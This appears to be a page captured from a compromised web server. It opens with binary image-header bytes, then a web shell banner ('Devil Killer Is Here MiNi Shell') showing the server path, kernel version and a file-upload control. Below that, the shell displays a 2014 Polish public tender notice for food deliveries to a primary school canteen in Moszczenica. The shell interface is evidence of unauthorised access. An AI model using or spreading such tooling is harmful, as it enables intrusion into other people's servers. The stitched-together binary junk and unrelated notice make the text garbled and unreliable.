JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141124/384294-N-2014.html

<p class="kh_header"><b>Moszczenica: Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej w  Szkole Podstawowej im. św. Stanisława Kostki w Moszczenicy, pow. piotrkowski, woj. łódzkie.</b><br>
<b>Numer ogłoszenia: 384294 - 2014; data zamieszczenia: 24.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa w Moszczenicy , ul. Dworcowa 9, 97-310 Moszczenica, woj. łódzkie, tel. 44 616 95 00, faks 44 616 95 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp.moszczenica.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej w  Szkole Podstawowej im. św. Stanisława Kostki w Moszczenicy, pow. piotrkowski, woj. łódzkie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa  artykułów spożywczych do stołówki szkolnej na potrzeby wyżywienia uczniów i dzieci w Szkole Podstawowej im. św. w Moszczenicy, Dworcowa 9, 97 - 310 Moszczenica.

FORMULARZ OFERTOWY SZCZEGÓŁOWY  

ARTYKUŁY SPOŻYWCZE SUCHE  , PRZYPRAWOWE I PRZETWORY OWOCOWO-WARZYWNE, PRODUKTY GARMAŻERYJNE	 	 	 	 	 	 	 
Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT %	Wartość netto  
	 Wartość brutto


1	2	3	4	5	6	7	8	9

1	Cukier kryształ biały 1kg	kg	260					
2	Soki 430 ml	szt.	100					
3	Dżem owocowy niskosłodzony słoik o zawartości nie mniej niż 40% 280g	szt.	240					
4	Groch łupany  400 g 	kg	50					
5	Groszek konserwowy puszka 400g	szt.	30					
6	Ogórek konserwowy w słoiku 870 ml	szt.	210					
7	Aromat waniliowy 10 ml.	szt.	20					
8	Cukier puder 0,4 kg	szt.
	50
					
9.	Jajka kurze kl. A	szt.	7000					
10.	Koncentrat pomidorowy 30% 215 g	szt.	220					
11.	Kasza jęczmienna średnia  1kg	kg	27					
12.	Barszcz czerwony w proszku  Winiary 60 g             	kg	150					
13.	Proszek do pieczenia 30g	szt.	20					
14.	Zupa grzybowa 48 g	szt.	100					
15.	Cynamon 27g	szt.	20					
16.	Cukier waniliowy 32 g	szt.	35					
17.	Chrzan 290 g	szt.	25					
18.	Mąka pszenna 1kg	kg	450					
19.	Majeranek 10 g	szt.	20					
20.	Przyprawa do zup płynna 200 g	L	200					
21.	Majonez 600 g	szt.	45					
22.	Olej spożywczy rzepakowy 1 l.
                                                 
                                          	szt.
	350					
23.	Pieprz czarny mielony 20g-25g	szt.	80					
24.	Ryż biały  1kg	kg	125					
25.	Sól jodowana biała 1kg	kg	120					
26.	Sos do spaghetti torebka 45-51 g	szt. 	60					
27.	Zupa barszcz biały Winiary 42-66 g	szt. 	50					
28.	Barszcz biały butelka 0,4l	szt.	150					
29.	Fasola Jaś średnia 1 kg	kg	130					
30.	Kostki rosołowe drobiowe 180g	szt. 	20					
31.	Kwasek cytrynowy 20g	szt.	40					
32.	Przyprawa wieloskładnikowa warzywna sypka do potraw 200g	szt.	180					
33.	Kasza manna 1 kg	kg	90					
34.	Mąka ziemniaczana1 kg	kg	10					
35.	Żurek w torebce Winiary 49 g	szt. 	70					
36.	Kisiel Winiary 77 g	szt.	200					
37.	Zupa pieczarkowa Delekta 50 g 	szt. 	100					
38.	Sos ciemny pieczeniowy Winiary 30 g	kg	180					
39.	Makaron kolanko z falbanką 1 kg
	szt.	90					
40.	Makaron spaghetti  0,4 kg	szt.	280					
41.	Makaron świderki 1kg	kg	270					
42.	Wafelki Grześki 36 g	szt.	2700					
43.	Czekolada Wedel lub równoważne 100 g	szt.	1900					
44.	Makaron rurka Lubella 0,4 kg	szt.	120	
				
45.	Makaron do rosołu Czaniec 0,5 kg	szt.	85	
				
46.	Makaron muszelki Lubella 400 g	szt.	160					
47.	Makaron zacierka Goliard 0,25 kg	szt. 	160	
				
48.	Sos do sałatek różne smaki Knorr 9 g	szt.	100	
				
49.	Rodzynki 100 g	szt. 	25	
				
50.	Sos do potraw chińskich Łowicz  520 g	szt.	60	
				
51.	Sos do spaghetti Łowicz - 520 g	szt. 	100	
				
52.	Pieprz ziarnisty 20 g	szt. 	20	
				
53.	Delikat do mięs Knorr 200 g	szt.	60		
			
54.	Przyprawa Złocisty kurczak 40 g	szt.	40		
			
55.	Koncentrat buraczany Pińczów 330 ml	szt. 	50		
			
56.	Kasz jęczmienna gruba 1 kg	kg	100		
			
57.	Czosnek granulowany     20 g	szt.	30		
			
58.	Fasola Jaś drobny 1 kg	szt.	40		
			
59.	Marmolada wieloowocowa 0,55 kg	szt.	6			
		
60.	Pierogi z serem 0,45 kg	kg 	150			
		
61.	Pierogi z mięsem 0,45 kg	kg	110			
		
62.	Pierożki delikatesowe (uszka) 0,3 kg	kg	60			
		
63.	Pierogi z kapustą i mięsem 0,45 kg	kg	150			
		
64.	Kopytka 0,45 kg	kg	180			
		
66.	Kluski leniwe 0,45 kg	kg	120					
67.	Wafelki Góralki 50 g	szt.	300					
68.	Wafelki Princessa 35 g (49 g)	szt.	300					
69.	Koncentrat szczawiowy Łowicz  330 g	szt.	50					
70.	Sos słodko-kwaśny Łowicz 520 g	szt.	15					
71.	Płatki kukurydziane Lubella   500 g	kg	4					
72.	Ziele angielskie Interjarek 15 g	szt.	5					
73.	Galaretka (różne smaki) Delecta  75 g	szt.	80					
74.	Budyń - różne smaki Delecta 64 g	szt.	80					
75.	Liść laurowy Interjarek  8 g	szt. 	4					
76.	Sos myśliwski Winiary 30 g	sł.	30			
		
77.	Makaron łazanki  Lubella 500 g	kg	20					
                   

NABIAŁ 
	 	 	 	 	 	 
Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT %	Wartość netto 
	 Wartość brutto



1	2	3	4	5	6	7	8	9

1.	Masło śmietankowe o zawartości nie mniej niż 67% 250g	szt.	40					
2.	Mleko 2% 1L	L	650					
3.	Śmietana 12% 400g Hej	l	1350					
4.	Serek topiony o zawartości tłuszczu nie mniej niż 25% Hochland 100g	kg	50					
5.	Twaróg biały półtłusty Czrnocin  1 kg	kg	180					
6.	Ser żółty pełnotłusty Gouda  1kg lub równoważny	kg	70					
7.	Serek Bakoma lub Bakuś 90 g	szt.	1400					
8.	Serek Danone lub równoważny 140 g	szt.	2000					
9.	Kefir 400 ml	szt.	160					
10.	Margaryna Kasia 250 g	szt.	130					
11.	Serek homogenizowany Kaśka  120 g	szt.	1100					
12.	Jogurt Ale owoc 150 g	szt.	2000		
			
13.	Jogurt Fantazja 122 g	szt.	1400		
			
14.	Deser Satino Bakoma     170 g	szt.	1100		
			
15.	Jogurt naturalny Czarnocin 370 g	szt.	40					


PIECZYWO	 	 	 	 	 	 	 
						 

Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT %	Wartość netto 
	 Wartość brutto


1	2	3	4	5	6	7	8	9

1.	Bułka zwykła 100g	szt. 	450					
2.	Bułka tarta 1kg	kg	140					
3.	Chleb krojony pszenno-żytni jasny 600g-900g	szt.	500					
4.	Drożdże 100 g	kg	30		
			

WARZYWA i OWOCE	 	 	 	 	 	 	 
		
Lp.	
Nazwa artykułu i gramatura opakowanie	
Jednostka	
Ilość 	Cena  netto za jednostkę	Stawka VAT %	Wartość netto 	 Wartość brutto




1	2	3	4	5	6	7	8

1	Ziemniaki jadalne typu kulinarnego (irga,bryza)	kg	6000				
2	Kapusta biała świeża	kg	380				
3	Marchew korzeń	kg	620				
4	Cebula biała korzeń	kg	80				
5	Pieczarki gat I	kg	150				
6	Rzodkiewka	pęczek	50				
7	Ogórek  zielony świeży	kg	200				
8.	Buraki czerwone świeże	kg	400				
9.	Kapusta kwaszona	kg	380				
10.	Jabłka gat I	kg	1200				
11.	Kapusta pekińska świeża	kg	140				
12.	Fasola czerwona konserwowa 400 g	szt.	25				
13.	Seler korzeń	kg	250				
14.	Pomidory świeże	kg	45				
15.	Sałata zielona	szt.	380				
16.	Kapusta czerwona świeża	kg	120				
17.	Por 	szt.	250				
18.	Koper zielony świeży	pęczek	40				
19.	Pietruszka korzeń	kg	250				
20.	Kalafior 	szt.	140				
21.	Banany 	kg	500				
22.	Papryka świeża czerwona	kg	15				
23.	Ogórek kiszony	kg	350				
24. 	Mandarynki 	kg	400				
25. 	Pomarańcza 	kg	280				
26.	Kukurydza konserwowa 400 g	szt. 	45				
27.	Nektarynki	kg	100			
	
28.	Gruszki	kg	120			
	
29.	Czosnek główka	szt.	10				
30.	Natka pietruszki	pęczek	15				


MROŻONKI i RYBY	 	 	 	 	 	 	 


Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę 	Stawka VAT %	Wartość netto 
	 Wartość brutto



1	2	3	4	5	6	7	8	9

1.	Fasolka szparagowa 450g	szt.	75					
2.	Kalafior  450 g	szt.	120					
3.	Mieszanka jarzynowa 8-składnikowa 450g	szt.	160					
4.	Marchew mrożona mini 450 g	szt.	100					
5.	Mieszanka kompotowa o,45 kg	szt.	250					
6.	Ryby(filet bez ości, bez glazury, bez skóry-morszczuk)kg	kg	100					
7.	Brokuły 450 g	szt.	65					
8.	Brukselka 450 g	szt.	60					
9.	Truskawka mrożona o,45 kg	szt.	150					
10.	Wiśnie mrożone 0,5 kg	szt. 	100					
11.	Filet z miruny z/s	kg	150		
			
12.	Barszcz ukraiński 450 g	szt.	100		
			
13.	Mieszanka chińska 450 g	szt.	35		
			
14.	Marchew mrożona kostka 45o g	szt.	25		
			
15.	Frytki 2,5 kg	szt.	160		
			


MIĘSO, PRZETWORY WIEPRZOWO-WOŁOWE
	 	 	 	 	 	 
. 
Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Cena netto za jednostkę	VAT %	Wartość netto 
	 Wartość brutto





1	2	3	4	5	6	7	8

1	Boczek wędzony nieparzony	kg	30				
2	Kiełbasa wiejska cienka o zawartości mięsa nie mniej niż 60%	kg	250				
3	Karczek b/k wieprzowy	kg	600				
4	Żeberka 	kg	240				
5	Mortadela	kg	170				
6	Mięso mielone	kg	420				
7	Antrykot	kg	30				
8.	Smalec	kg	80				
9.	Słonina surowa bez skóry	kg	10				
10.	Boczek surowy	kg	30
				
11.	Schab z/k wieprzowy	kg	650				
12.	Golonka	kg	25				
13.	Wołowina b/k	kg	180				

produkty z wykluczeniem mięsa mechanicznie odkostnionego.

                    
                             
MIĘSO DROBIOWE	 	 	 	 	 	 	 

Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Cena  netto za jednostkę	 VAT %	Wartość netto 
	 Wartość brutto




1	2	3	4	5	6	7	8

1.	Filet z kurczaka surowy	kg	260				
2.	Kurczak	kg	200				
3.	Porcja rosołowa  kurczaka ze skrzydłem	kg	30				
4.	Udziec z kurczaka	kg	480				
5.	Porcja rosołowa b/skrz.	kg	180				
6.	Wątróbka drobiowa	kg	150				
7.	Mięso mielone z drobiu	kg	50				

                                                                                                                                                            
Informacje dodatkowe:

1.Wykonawca zobowiązuje się sukcesywnie dostarczać dla Zamawiającego artykuły spożywcze przedstawione w szczegółowych formularzach cenowych stanowiących załączniki nr od 1-7  od  dnia podpisania niniejszej umowy do 31 grudnia 2015 roku
2. Realizacja dostaw odbywać się będzie od poniedziałku do piątku w godzinach:

Zadanie 1  (artykuły spożywcze suche, przyprawowe i przetwory owocowo-warzywne) 
- 3 razy w tygodniu od godz. 7.00 do godz. 7.30

Zadanie 2  ( nabiał ) -  codziennie od godz.6.30 do godz. 7.30

Zadanie 3  ( pieczywo ) - codziennie od godz.6.30 do godz. 7.30

Zadanie 4  ( warzywa i owoce ) - codziennie od godz.6.30 do godz. 7.30

Zadanie 5  ( mrożonki i ryby ) - 2 razy w tygodniu od godz. 6.30 do godz. 7.30

Zadanie  6 ( mięso, przetwory wieprzowo- wołowe i drobiowe )
 -  codziennie od godz. 7.00 do godz. 7.30

Zadanie 7 ( mięso drobiowe )  -  1 raz w tygodniu od godz. 7.00 do godz. 7.30

z tolerancją  + 30 minut dnia następnego od przekazania zamówienia w formie pisemnej, elektronicznie, faksem lub  po telefonicznym uzgodnieniu.
3. Towar będzie dowożony przez Wykonawcę własnym transportem, na jego koszt, w odpowiednich opakowaniach zapewniających właściwe zabezpieczenie przewożonych artykułów wraz z jego rozładunkiem do magazynu Zamawiającego.
4. Każdorazowa dostawa musi być zgodna pod względem jakościowym i ilościowym z bieżącym zamówieniem Zamawiającego, potwierdzona i odebrana przez upoważnionego przedstawiciela Zamawiającego tj: intendenta lub osobę pisemne upoważnioną przez Dyrektora placówki.
5. Wykonawca przy każdej dostawie zobowiązany jest do dołączenia dokumentu magazynowego (dowodu dostawy lub dokumentu WZ) z wyszczególnieniem produktów i ich ilości oraz faktury VAT .
6. Za datę wykonania poszczególnej dostawy, uważa się datę przyjęcia zamówionych artykułów  bez zastrzeżeń .

7.  Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia ilości artykułów w stosunku do ilości określonych w szczegółowym formularzu cenowym stanowiącym załącznik do oferty nr 1,2,3,4,5,6 i 7 bądź rezygnacji z niektórych artykułów w zależności od liczby żywionych osób i jadłospisów obowiązujących u Zamawiającego w okresie obowiązywania umowy. Nie może to stanowić podstawy do wnoszenia przez Wykonawcę jakichkolwiek roszczeń.
8. Zamawiającemu będzie przysługiwać prawo składania reklamacji dotyczących ilości 
i   jakości dostarczanych artykułów z żądaniem ich wymiany lub uzupełnienia.
9. Wykonawca dokona uzupełnienia lub wymiany towaru w ciągu jednej godziny na towar wolny od wad. Zamawiający nie odpowiada za straty poniesione przez Wykonawcę z tego tytułu.
10. Wykonawca zobowiązuje się do dostarczenia artykułów spożywczych, towarów 
w pierwszej jakości, odpowiadających aktualnym normom jakościowym.

Kod CPV 03221000-6, 03222300-6, 15811000-6, 15331170-9, 03142500-3, 15800000-6, - 15100000-9, 15500000-3, 15889600-5..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 15.81.10.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3, 15.88.96.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, formularz cenowy dla danej części zamówienia, oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy, pełnomocnictwo (o ile w imieniu wykonawcy działa pełnomocnik).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Zamawiający przewiduje zmiany zawartej umowy w przypadku m.in. zaistnienia następujących okoliczości:
1. W przypadku zmiany osób związanych z obsługą  administracyjno - organizacyjną, a uczestniczących w wykonaniu niniejszego zamówienia wymaga aprobaty stron umowy, natomiast nie wymaga sporządzenia aneksu.
2. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w następujących przypadkach:
a) zmiana danych Wykonawcy ( np. zmiana adresu, nazwy) lub zmiana wynikająca z przekształcenia podmiotowego po stronie Wykonawcy,
b) podwyższenia jakości parametrów lub innych cech charakterystycznych dla przedmiotu dostawy,  nazwy własnej produktu, pod warunkiem wprowadzenia na rynek produktu o wyższej jakości, lepszych parametrach lub innych korzystniejszych  cechach charakterystycznych przy zachowaniu ceny oferowanej dla danego produktu na podstawie pisemnego wniosku Wykonawcy pod warunkiem uzyskania zgody przez Zamawiającego,
c) w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostawy, możliwość dostarczenia odpowiednich towarów objętych umową, o parametrach nie gorszych, niż towary objęte oferta, przy zachowaniu ceny ofertowej towaru, na podstawie pisemnego wniosku Wykonawcy pod warunkiem uzyskania zgody przez Zamawiającego,
d) w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne) mogą ulec zmianie terminy sukcesywnych dostaw objętych niniejsza umową.
3.Wszelkie zmiany postanowień niniejszej umowy wymagają dla swej ważności zachowania formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp.moszczenica.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. św. Stanisława Kostki w Moszczenicy, Dworcowa 9, 97-310 Moszczenica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2014 godzina 09:30, miejsce: Szkoła Podstawowa im. św. Stanisława Kostki w Moszczenicy, Dworcowa 9, 97-310 Moszczenica - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





